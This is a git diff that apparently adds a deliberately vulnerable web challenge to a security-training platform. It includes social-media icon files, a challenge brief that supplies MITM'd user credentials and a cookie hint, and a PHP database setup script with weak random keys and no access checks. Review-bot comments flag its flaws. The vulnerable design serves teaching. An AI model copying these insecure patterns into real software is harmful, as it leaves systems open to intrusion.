diff --git a/challenges/newchallenge4/inside/newicons/gmail32.png b/challenges/newchallenge4/inside/newicons/gmail32.png
new file mode 100755
index 00000000..fd70437e
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/gmail32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/google24_2.png b/challenges/newchallenge4/inside/newicons/google24_2.png
new file mode 100755
index 00000000..7b868772
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/google24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/instagram.png b/challenges/newchallenge4/inside/newicons/instagram.png
new file mode 100755
index 00000000..68bb1a39
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/instagram.png differ
diff --git a/challenges/newchallenge4/inside/newicons/linkedin24_2.png b/challenges/newchallenge4/inside/newicons/linkedin24_2.png
new file mode 100755
index 00000000..4dc9c022
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/linkedin24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/linkedin32.png b/challenges/newchallenge4/inside/newicons/linkedin32.png
new file mode 100755
index 00000000..ea15de25
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/linkedin32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/mail24_1.png b/challenges/newchallenge4/inside/newicons/mail24_1.png
new file mode 100755
index 00000000..66ec95c5
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/mail24_1.png differ
diff --git a/challenges/newchallenge4/inside/newicons/mail24_2.png b/challenges/newchallenge4/inside/newicons/mail24_2.png
new file mode 100755
index 00000000..c59cac41
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/mail24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/mail64_1.png b/challenges/newchallenge4/inside/newicons/mail64_1.png
new file mode 100755
index 00000000..d94a3416
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/mail64_1.png differ
diff --git a/challenges/newchallenge4/inside/newicons/place24.png b/challenges/newchallenge4/inside/newicons/place24.png
new file mode 100755
index 00000000..721525ed
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/place24.png differ
diff --git a/challenges/newchallenge4/inside/newicons/place32.png b/challenges/newchallenge4/inside/newicons/place32.png
new file mode 100755
index 00000000..87b6dee6
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/place32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twit.png b/challenges/newchallenge4/inside/newicons/twit.png
new file mode 100755
index 00000000..16b88d59
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twit.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twitter24_2.png b/challenges/newchallenge4/inside/newicons/twitter24_2.png
new file mode 100755
index 00000000..57c3b201
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twitter24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twitter32.png b/challenges/newchallenge4/inside/newicons/twitter32.png
new file mode 100755
index 00000000..14fb00c1
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twitter32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twitter32_1.png b/challenges/newchallenge4/inside/newicons/twitter32_1.png
new file mode 100755
index 00000000..0d2778f6
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twitter32_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_1.png b/challenges/newchallenge4/inside/use-icon/fb48_1.png
new file mode 100755
index 00000000..b6bc1b76
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_2.png b/challenges/newchallenge4/inside/use-icon/fb48_2.png
new file mode 100755
index 00000000..1b0af134
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_2.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_3.png b/challenges/newchallenge4/inside/use-icon/fb48_3.png
new file mode 100755
index 00000000..09694e85
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_4.png b/challenges/newchallenge4/inside/use-icon/fb48_4.png
new file mode 100755
index 00000000..89526692
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb_32.png b/challenges/newchallenge4/inside/use-icon/fb_32.png
new file mode 100755
index 00000000..4be62fb2
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb_32.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/gplus48.png b/challenges/newchallenge4/inside/use-icon/gplus48.png
new file mode 100755
index 00000000..983f1afb
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/gplus48_2.png b/challenges/newchallenge4/inside/use-icon/gplus48_2.png
new file mode 100755
index 00000000..ee2a147c
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48_2.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/gplus48_3.png b/challenges/newchallenge4/inside/use-icon/gplus48_3.png
new file mode 100755
index 00000000..9cc71349
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/gplus48_4.png b/challenges/newchallenge4/inside/use-icon/gplus48_4.png
new file mode 100755
index 00000000..549ae0ed
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_1.png b/challenges/newchallenge4/inside/use-icon/linkedin48_1.png
new file mode 100755
index 00000000..7a8e11ac
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_2.png b/challenges/newchallenge4/inside/use-icon/linkedin48_2.png
new file mode 100755
index 00000000..417514aa
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_2.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_3.png b/challenges/newchallenge4/inside/use-icon/linkedin48_3.png
new file mode 100755
index 00000000..9a77eef9
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin48_4.png b/challenges/newchallenge4/inside/use-icon/linkedin48_4.png
new file mode 100755
index 00000000..b35db457
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/linkedin_32.png b/challenges/newchallenge4/inside/use-icon/linkedin_32.png
new file mode 100755
index 00000000..9c009a52
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/linkedin_32.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/mail32.png b/challenges/newchallenge4/inside/use-icon/mail32.png
new file mode 100755
index 00000000..bf5a04fd
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/mail32.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/mail32_1.png b/challenges/newchallenge4/inside/use-icon/mail32_1.png
new file mode 100755
index 00000000..e80e9b08
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/mail32_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/msg_1png b/challenges/newchallenge4/inside/use-icon/msg_1png
new file mode 100755
index 00000000..c49221ad
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/msg_1png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_1.png b/challenges/newchallenge4/inside/use-icon/twitter48_1.png
new file mode 100755
index 00000000..fa928111
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_2.png b/challenges/newchallenge4/inside/use-icon/twitter48_2.png
new file mode 100755
index 00000000..2a560776
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_2.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_3.png b/challenges/newchallenge4/inside/use-icon/twitter48_3.png
new file mode 100755
index 00000000..b8ab821d
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter48_4.png b/challenges/newchallenge4/inside/use-icon/twitter48_4.png
new file mode 100755
index 00000000..0bc14d99
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/twitter_32.png b/challenges/newchallenge4/inside/use-icon/twitter_32.png
new file mode 100755
index 00000000..bbcc2cc2
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/twitter_32.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/facebook.png b/challenges/newchallenge4/inside/use-icons/facebook.png
new file mode 100755
index 00000000..5fb0213b
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/facebook.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/google.png b/challenges/newchallenge4/inside/use-icons/google.png
new file mode 100755
index 00000000..2942c7ea
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/google.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/linkedin.png b/challenges/newchallenge4/inside/use-icons/linkedin.png
new file mode 100755
index 00000000..ba6a753b
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/linkedin.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/submit.png b/challenges/newchallenge4/inside/use-icons/submit.png
new file mode 100755
index 00000000..7e35d6d5
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/submit.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/submit_check.png b/challenges/newchallenge4/inside/use-icons/submit_check.png
new file mode 100755
index 00000000..d8da4735
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/submit_check.png differ
diff --git a/challenges/newchallenge4/inside/use-icons/twitter.png b/challenges/newchallenge4/inside/use-icons/twitter.png
new file mode 100755
index 00000000..9b81a0d6
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icons/twitter.png differ
diff --git a/challenges/newchallenge4/newchallenge4.xml b/challenges/newchallenge4/newchallenge4.xml
new file mode 100755
index 00000000..b6818b02
--- /dev/null
+++ b/challenges/newchallenge4/newchallenge4.xml
@@ -0,0 +1,17 @@
+
+
+ New Challenge 3
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ SITE. However, they have solved this to an extent and have MITM'd a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn't enough to get to the user's profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.
Hint : Wanna have a Cookie ??
+ ]]>
+
+
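Review bot: The title in this new `newchallenge4.xml` reads `New Challenge 3`, which does not match the file and directory name `newchallenge4`. If challenge listings are keyed or displayed by title, this entry may collide with, or be mistaken for, another challenge. Either rename the title to `New Challenge 4` or confirm that the numbering is intentional. The markup of this hunk is not visible here, so only the text content was reviewed.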
diff --git a/challenges/newchallenge4/sql-connections/db-creds.inc b/challenges/newchallenge4/sql-connections/db-creds.inc
new file mode 100755
index 00000000..cf303275
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/db-creds.inc
@@ -0,0 +1,10 @@
+
+
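Review bot: The `.inc` extension on `db-creds.inc` is not passed to the PHP interpreter in a default web-server configuration, so if `sql-connections/` sits under the document root the file may be returned as plain text to anyone who requests it. The body of this hunk is not visible here, so this is inferred from the path alone. If the file holds the `$host`, `$dbuser` and `$dbpass` values that `setup-db-challenge.php` uses, renaming it to `db-creds.inc.php` or denying HTTP access to the directory would avoid exposing them. The `100755` mode is also unnecessary for a file that is only included.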
diff --git a/challenges/newchallenge4/sql-connections/functions.php b/challenges/newchallenge4/sql-connections/functions.php
new file mode 100755
index 00000000..aa92d095
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/functions.php
@@ -0,0 +1,91 @@
+
diff --git a/challenges/newchallenge4/sql-connections/setup-db-challenge.php b/challenges/newchallenge4/sql-connections/setup-db-challenge.php
new file mode 100755
index 00000000..09c225bc
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/setup-db-challenge.php
@@ -0,0 +1,80 @@
+
+
+
+
+
+
+
+";
+@error_reporting(0);
+if(isset($_GET['id']))
+$id = $_GET['id'];
+//echo $id;
+
+// Check connection
+@$con = mysql_connect($host,$dbuser,$dbpass);
+if (!$con)
+{
+ echo "Failed to connect to MySQL: " . mysql_error();
+}
+
+
+//purging Old Database for challenges
+ $sql="DROP DATABASE IF EXISTS $dbname1";
+ if (mysql_query($sql))
+ {echo "Old database purged if exists"; echo "
\n";}
+
+
+
+
+//Creating new database for challenges
+ $sql="CREATE database $dbname1 CHARACTER SET `gbk` ";
+ if (mysql_query($sql))
+ {echo "Creating New database successfully";echo "
\n";}
+
+
+// creating random key
+$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; //characterset for generating random data
+$sec_key = num_gen(24, $characters);
+$hash = md5(rand(0,100000));
+
+//inserting Dummy data into table
+$sql="INSERT INTO $dbname1.$table VALUES (1, '$hash', '$sec_key', 0)";
+ if (mysql_query($sql))
+ {echo "Inserted data correctly into table '$table'";echo "
\n";}
+
+
+
+//including the Challenges DB creation file.
+include("../sql-connections/setup-db-challenge.php");
+?>
+
+
+
+
+
+
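Review bot: `$hash = md5(rand(0,100000));` can take only 100,001 distinct values and `rand()` is not a cryptographic generator, so if the value inserted into `$dbname1.$table` is meant to stay secret it can be enumerated; a CSPRNG source such as `$hash = bin2hex(openssl_random_pseudo_bytes(16));` (or `random_bytes()` on PHP 7+) fits better. The `if (!$con)` branch only echoes `mysql_error()` and then falls through to `DROP DATABASE IF EXISTS $dbname1`, so the script should stop there, for example `die("Failed to connect to MySQL");`, which also keeps the driver error text out of the response. The closing `include("../sql-connections/setup-db-challenge.php");` appears to name this same file, which would re-run the drop/create sequence recursively; confirm the intended target. `$id = $_GET['id'];` is never used in the visible lines and can be dropped. Nothing visible restricts who may request this destructive script, which is worth confirming since parts of the hunk are not shown here.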
diff --git a/challenges/newchallenge4/sql-connections/sql-connect-1.php b/challenges/newchallenge4/sql-connections/sql-connect-1.php
new file mode 100755
index 00000000..8b1f9ed3
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/sql-connect-1.php
@@ -0,0 +1,29 @@
+
+
+
+
+
+
diff --git a/challenges/newchallenge4/sql-connections/sql-connect.php b/challenges/newchallenge4/sql-connections/sql-connect.php
new file mode 100755
index 00000000..611c6b96
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/sql-connect.php
@@ -0,0 +1,34 @@
+
+
+
+
+
+
diff --git a/challenges/newchallenge4/sql-connections/sqli-connect.php b/challenges/newchallenge4/sql-connections/sqli-connect.php
new file mode 100755
index 00000000..82132e92
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/sqli-connect.php
@@ -0,0 +1,25 @@
+
+
+
+
+
+
diff --git a/challenges/newchallenge4/sql-connections/test.php b/challenges/newchallenge4/sql-connections/test.php
new file mode 100755
index 00000000..4c00cd27
--- /dev/null
+++ b/challenges/newchallenge4/sql-connections/test.php
@@ -0,0 +1,11 @@
+
diff --git a/composer.json b/composer.json
old mode 100644
new mode 100755
diff --git a/controller/class.ChallengeListController.php b/controller/class.ChallengeListController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ChallengeMonitorController.php b/controller/class.ChallengeMonitorController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ChallengeValidatorController.php b/controller/class.ChallengeValidatorController.php
old mode 100644
new mode 100755
diff --git a/controller/class.HackademicController.php b/controller/class.HackademicController.php
old mode 100644
new mode 100755
diff --git a/controller/class.LoginController.php b/controller/class.LoginController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ProgressReportController.php b/controller/class.ProgressReportController.php
old mode 100644
new mode 100755
diff --git a/controller/class.RankingsController.php b/controller/class.RankingsController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ReadArticleController.php b/controller/class.ReadArticleController.php
old mode 100644
new mode 100755
diff --git a/controller/class.ShowChallengeController.php b/controller/class.ShowChallengeController.php
old mode 100644
new mode 100755
diff --git a/controller/class.TryChallengeController.php b/controller/class.TryChallengeController.php
old mode 100644
new mode 100755
diff --git a/controller/index.php b/controller/index.php
old mode 100644
new mode 100755
diff --git a/docs/API docs - Actions.csv b/docs/API docs - Actions.csv
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Actions.md b/docs/Plugin-API-Actions.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Install.md b/docs/Plugin-API-Install.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Overview.md b/docs/Plugin-API-Overview.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Pages-and-Menus.md b/docs/Plugin-API-Pages-and-Menus.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Plugin.md b/docs/Plugin-API-Plugin.md
old mode 100644
new mode 100755
diff --git a/docs/Plugin-API-Theme.md b/docs/Plugin-API-Theme.md
old mode 100644
new mode 100755
diff --git a/docs/docs.php b/docs/docs.php
old mode 100644
new mode 100755
diff --git a/docs/plugindocs.sql b/docs/plugindocs.sql
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/COPYING.lib b/extlib/Smarty-3.1.21/COPYING.lib
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/README b/extlib/Smarty-3.1.21/README
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/SMARTY_2_BC_NOTES.txt b/extlib/Smarty-3.1.21/SMARTY_2_BC_NOTES.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/SMARTY_3.0_BC_NOTES.txt b/extlib/Smarty-3.1.21/SMARTY_3.0_BC_NOTES.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/SMARTY_3.1_NOTES.txt b/extlib/Smarty-3.1.21/SMARTY_3.1_NOTES.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/change_log.txt b/extlib/Smarty-3.1.21/change_log.txt
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/configs/test.conf b/extlib/Smarty-3.1.21/demo/configs/test.conf
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/index.php b/extlib/Smarty-3.1.21/demo/index.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/cacheresource.apc.php b/extlib/Smarty-3.1.21/demo/plugins/cacheresource.apc.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/cacheresource.memcache.php b/extlib/Smarty-3.1.21/demo/plugins/cacheresource.memcache.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/cacheresource.mysql.php b/extlib/Smarty-3.1.21/demo/plugins/cacheresource.mysql.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/resource.extendsall.php b/extlib/Smarty-3.1.21/demo/plugins/resource.extendsall.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/resource.mysql.php b/extlib/Smarty-3.1.21/demo/plugins/resource.mysql.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/plugins/resource.mysqls.php b/extlib/Smarty-3.1.21/demo/plugins/resource.mysqls.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/templates/footer.tpl b/extlib/Smarty-3.1.21/demo/templates/footer.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/templates/header.tpl b/extlib/Smarty-3.1.21/demo/templates/header.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/demo/templates/index.tpl b/extlib/Smarty-3.1.21/demo/templates/index.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/Smarty.class.php b/extlib/Smarty-3.1.21/libs/Smarty.class.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/SmartyBC.class.php b/extlib/Smarty-3.1.21/libs/SmartyBC.class.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/debug.tpl b/extlib/Smarty-3.1.21/libs/debug.tpl
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/block.textformat.php b/extlib/Smarty-3.1.21/libs/plugins/block.textformat.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.counter.php b/extlib/Smarty-3.1.21/libs/plugins/function.counter.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.cycle.php b/extlib/Smarty-3.1.21/libs/plugins/function.cycle.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.fetch.php b/extlib/Smarty-3.1.21/libs/plugins/function.fetch.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_checkboxes.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_checkboxes.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_image.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_image.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_options.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_options.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_radios.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_radios.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_select_date.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_select_date.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_select_time.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_select_time.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.html_table.php b/extlib/Smarty-3.1.21/libs/plugins/function.html_table.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.locale.php b/extlib/Smarty-3.1.21/libs/plugins/function.locale.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.mailto.php b/extlib/Smarty-3.1.21/libs/plugins/function.mailto.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/function.math.php b/extlib/Smarty-3.1.21/libs/plugins/function.math.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.capitalize.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.capitalize.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.date_format.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.date_format.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.debug_print_var.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.debug_print_var.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.escape.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.escape.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.regex_replace.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.regex_replace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.replace.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.replace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.spacify.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.spacify.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifier.truncate.php b/extlib/Smarty-3.1.21/libs/plugins/modifier.truncate.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.cat.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.cat.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_characters.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_characters.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_paragraphs.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_paragraphs.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_sentences.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_sentences.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_words.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.count_words.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.default.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.default.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.escape.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.escape.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.from_charset.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.from_charset.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.indent.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.indent.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.lower.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.lower.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.noprint.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.noprint.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.string_format.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.string_format.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip_tags.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.strip_tags.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.to_charset.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.to_charset.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.unescape.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.unescape.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.upper.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.upper.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.wordwrap.php b/extlib/Smarty-3.1.21/libs/plugins/modifiercompiler.wordwrap.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/outputfilter.trimwhitespace.php b/extlib/Smarty-3.1.21/libs/plugins/outputfilter.trimwhitespace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.escape_special_chars.php b/extlib/Smarty-3.1.21/libs/plugins/shared.escape_special_chars.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.literal_compiler_param.php b/extlib/Smarty-3.1.21/libs/plugins/shared.literal_compiler_param.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.make_timestamp.php b/extlib/Smarty-3.1.21/libs/plugins/shared.make_timestamp.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.mb_str_replace.php b/extlib/Smarty-3.1.21/libs/plugins/shared.mb_str_replace.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.mb_unicode.php b/extlib/Smarty-3.1.21/libs/plugins/shared.mb_unicode.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/shared.mb_wordwrap.php b/extlib/Smarty-3.1.21/libs/plugins/shared.mb_wordwrap.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/plugins/variablefilter.htmlspecialchars.php b/extlib/Smarty-3.1.21/libs/plugins/variablefilter.htmlspecialchars.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_custom.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_custom.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_keyvaluestore.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_cacheresource_keyvaluestore.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_config_source.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_config_source.php
old mode 100644
new mode 100755
